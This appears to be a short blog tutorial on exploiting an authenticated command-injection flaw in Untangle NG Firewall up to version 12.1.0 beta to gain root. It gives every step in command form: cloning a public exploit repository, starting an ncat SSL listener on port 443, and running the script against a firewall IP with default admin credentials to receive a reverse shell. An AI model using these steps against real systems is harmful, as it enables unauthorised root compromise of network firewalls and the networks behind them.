Untangle’s NG Firewall enables us to quickly and easily create the
network policies that deliver the perfect balance between security and
productivity.
Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI
exploit. A command injection vulnerability exists in Untangle NG Firewall,
which allows non-root authenticated users to execute system commands with root
privileges. This exploit has been tested on Untangle NG Firewall versions 11.2,
12, 12.0.1, and 12.1.0 beta, but should work on previous versions. The
client-side sanitisation issues identified in the disclosure post can be
exploited with a web app proxy.
First of all clone the the github repo of the exploit and enter in
the directory with command:
git
clone https://github.com/3xocyte/Exploits && cd Exploits
and now give the python script
permission to execute with command:
chmod
+x untangle-ngfw-12.1-ci.py
Now set the netcat listener at port 443
for ssl connection in a new
terminal with command:
ncat --ssl
-nlvp 443
Now execute the python script with command:
python
untangle-ngfw-12.1-ci.py
192.168.2.1 192.168.2.3 admin
admin
Here 192.168.2.1 is the Untangle firewall IP and 192.168.2.3 is our system IP and username
, password of the Untangle Firewall are admin
, admin .
As soon as the above command is
successfully executed we get the reverse
shell.
0 comments:
Post a Comment